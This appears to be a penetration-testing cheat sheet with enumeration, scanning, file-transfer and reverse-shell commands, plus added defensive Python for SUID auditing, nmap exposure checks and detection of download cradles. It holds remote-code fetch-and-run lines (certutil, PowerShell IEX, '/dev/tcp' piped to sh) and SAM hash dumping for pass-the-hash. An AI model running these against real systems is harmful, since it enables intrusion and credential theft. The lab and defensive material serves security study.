Windows Enumeration
1. Run systeminfo to get the OS version, service pack and installed hotfixes, then look for:
   exploits:
     $ searchsploit, https://www.exploit-db.com/
   precompiled exploits:
     - https://github.com/abatchy17/WindowsExploits
     - https://github.com/SecWiki/windows-kernel-exploits
   missing-hotfix checks:
     https://github.com/rasta-mouse/Sherlock
2. net users, net user username
3. C:\Windows\System32\config\SAM and C:\Windows\System32\config\SYSTEM
   $ samdump2 SYSTEM SAM dumps the hashes from the SAM and SYSTEM hives; crack them with john/hashcat or use them directly with Pass The Hash (pth-curl, pth-net, pth-rpcclient, pth-smbclient, pth-smbget, pth-sqsh, pth-winexe, pth-wmic, pth-wmis)
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
4. Check installed programs in C:\Program Files and other locations
cheatsheet: https://guif.re/windowseop
Linux Enumeration
1. $ cat /etc/passwd to list existing users; check their home directories and the files owned by those users.
2. $ sudo -l to see whether you can run any binary/script with sudo.
3. $ find / -perm -4000 2>/dev/null to list SUID files.
4. $ cat /etc/crontab or crontab -l: are any cron jobs running?
   pspy tool https://github.com/DominicBreuker/pspy/releases finds binaries/scripts that are run repeatedly.
5. LinEnum.sh https://github.com/rebootuser/LinEnum, -t argument for a more thorough test.
6. GTFOBins https://gtfobins.github.io: search here for binaries that can be used to escalate privileges.
7. linpeas.sh
   $ ./linpeas.sh -a > /dev/shm/linpeas.txt
   $ less -r /dev/shm/linpeas.txt
cheatsheet: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
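The SUID check in step 3 is just as useful from the hardening side: a defender can take the same listing and diff it against the set of setuid binaries that are expected on the build. The following is an added example written for this page (not part of the original notes or of any tool linked above). The sample entries and the baseline set are constructed; the st_mode values are what os.lstat() would report for a regular file with and without the setuid bit.

```python
import os
import stat

# Constructed sample: (path, st_mode) pairs as os.lstat(path).st_mode would report them.
# 0o104755 = regular file (0o100000) + setuid (0o4000) + rwxr-xr-x; 0o100755 has no setuid bit.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/sudo", 0o104755),
    ("/usr/bin/find", 0o104755),   # setuid on find is not a default install state
    ("/usr/bin/ls", 0o100755),
    ("/tmp/backup.sh", 0o104755),  # setuid script in a world-writable directory
]

# Constructed baseline of setuid binaries expected on this (hypothetical) build.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}


def setuid_entries(entries):
    """Return the paths whose mode is a regular file with the setuid bit set
    (the same set that `find / -perm -4000 -type f` would print)."""
    return [path for path, mode in entries if stat.S_ISREG(mode) and mode & stat.S_ISUID]


def unexpected_setuid(entries, baseline):
    """Setuid files that are not on the baseline: the ones an audit should explain or remove."""
    return sorted(set(setuid_entries(entries)) - set(baseline))


def scan_filesystem(root="/"):
    """Collect (path, st_mode) from a live filesystem so it can be fed to the functions above.
    lstat is used so symlinks are not followed; unreadable paths are skipped."""
    collected = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                collected.append((path, os.lstat(path).st_mode))
            except OSError:
                continue
    return collected


if __name__ == "__main__":
    for path in unexpected_setuid(SAMPLE_ENTRIES, BASELINE):
        print("unexpected setuid file:", path)
```

On a real host, replace SAMPLE_ENTRIES with scan_filesystem() and BASELINE with the list recorded from a known-good image; anything the diff prints is either a packaging change to document or a file to strip the setuid bit from.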
Port Scan
$ masscan -p1-65535,U:1-65535 10.10.10.10 --rate=1000 -e tun0
$ nmap -A 10.10.10.10
SYN scan with default scripts and version detection: $ nmap -sCSV 10.10.10.10 -oA synscan
Full TCP connect scan of all ports with version detection: $ nmap -sTV -p- -Pn 10.10.10.10 -oA fulltcp
UDP scan for SNMP, tftp etc.: $ nmap -sU 10.10.10.10 -oA udpscan
$ nmap -sC -sV -O -oN res 10.10.10.10
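The -oA scans above also write an XML file (synscan.xml, fulltcp.xml, udpscan.xml). Parsing that file is more reliable than grepping the normal output, and it lets you compare what is actually exposed against what should be. This is an added example written for this page, not code from the original notes or from the nmap project. The XML below is a constructed, trimmed sample of nmap's output format; the allowlist of expected services is an assumption for the demonstration.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap XML output (as written by -oX / -oA), trimmed to the elements used here.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 10.10.10.10">
  <host>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/><service name="microsoft-ds"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_open_ports(xml_text):
    """Return {host_addr: [(protocol, port, service_name, product_version)]} for every port
    nmap reports as open; UDP 'open|filtered' is kept because nmap cannot tell the two apart."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        addr = host.find("address").get("addr")
        entries = []
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            if not state.startswith("open"):
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = ""
            if svc is not None:
                product = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            entries.append((port.get("protocol"), int(port.get("portid")), name, product))
        result[addr] = entries
    return result


def unexpected_services(parsed, allowlist):
    """Flag (host, protocol, port) triples that are open but not on the per-host allowlist
    of expected exposures. allowlist: {host_addr: {(protocol, port), ...}}."""
    flagged = []
    for host, ports in parsed.items():
        expected = allowlist.get(host, set())
        for proto, port, _name, _product in ports:
            if (proto, port) not in expected:
                flagged.append((host, proto, port))
    return flagged


if __name__ == "__main__":
    parsed = parse_open_ports(SAMPLE_NMAP_XML)
    for host, ports in parsed.items():
        for proto, port, name, product in ports:
            print(f"{host} {proto}/{port} {name} {product}".rstrip())
    print("unexpected:", unexpected_services(parsed, {"10.10.10.10": {("tcp", 22)}}))
```

To run it on a real scan, read synscan.xml into a string and pass it to parse_open_ports(); the allowlist is whatever the asset owner says the host should be serving.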
Web
dirb, dirsearch, gobuster, wfuzz
$ gobuster dir -u http://10.10.10.xxxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
https://wfuzz.readthedocs.io/en/latest/
Burp Suite
File Transfer
$ nc -lvnp 1234 > out.file        (receiving side)
$ nc 10.10.10.10 1234 < in.file   (sending side)
$ php -S 0.0.0.0:80
$ python3 -m http.server
$ python -m SimpleHTTPServer 80
$ wget/curl
C:\> certutil.exe -f -split -urlcache http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe
C:\> powershell.exe (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe", "C:\Windows\Temp\nc.exe")
C:\> powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
Without wget/curl on the target:
$ nc -q 5 -lvnp 80 < linpeas.sh          (your machine, serves the file)
$ cat < /dev/tcp/10.10.10.10/80 | sh     (target; use > linpeas.sh instead of | sh to save the file rather than run it)
SMB method:
Server: $ impacket-smbserver test /root/dir_to_share
Client: C:\> copy \\svr_ip\test\filename.exe .
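The certutil and PowerShell download lines above are exactly the command lines a blue team hunts for in process-creation telemetry, because the binaries are legitimate and only the arguments give them away. The following is an added example for this page, not part of the original notes: a small rule set applied to constructed process-creation records whose fields are modelled on Sysmon Event ID 1 (the event samples, user names and host names are made up for the demonstration). The patterns come only from the commands listed on this page.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style, simplified to three fields).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -f -split -urlcache http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe",
     "User": "WS01\\alice"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\setup.msi SHA256",   # benign certutil use
     "User": "WS01\\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')",
     "User": "WS01\\svc_build"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",   # benign scripted task
     "User": "WS01\\svc_build"},
]

# Each rule: (name, compiled regex run against the command line). Case-insensitive because
# PowerShell and certutil accept any casing of their arguments.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("powershell_webclient_download",
     re.compile(r"Net\.WebClient\)?\.Download(File|String)\(", re.I)),
    ("powershell_iex_cradle",
     re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
]


def match_rules(event):
    """Names of every rule whose pattern appears in the event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_events(events):
    """Return (user, image basename, [rule names]) for each event that matched at least one rule."""
    hits = []
    for event in events:
        names = match_rules(event)
        if names:
            hits.append((event["User"], event["Image"].rsplit("\\", 1)[-1], names))
    return hits


if __name__ == "__main__":
    for user, image, names in scan_events(SAMPLE_EVENTS):
        print(f"{user} ran {image}: {', '.join(names)}")
```

The two benign events are in the sample on purpose: certutil -hashfile and a plain -File invocation must not fire, otherwise the rule drowns in noise from normal administration. Tune the allow side (signed script paths, known service accounts) before deploying anything like this at scale.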
Reverse-Shell
Fully interactive TTY shell:
If you get a reverse shell but not a TTY shell, run:
  python -c 'import pty; pty.spawn("/bin/bash")'
then hit CTRL-Z, type "stty raw -echo" and press Enter, then type "fg" and press Enter. (Input is not echoed after the stty command, so simply type fg and press Enter.)
For Windows shells:
$ apt install rlwrap -y
Usage: $ rlwrap nc -lnvp 4444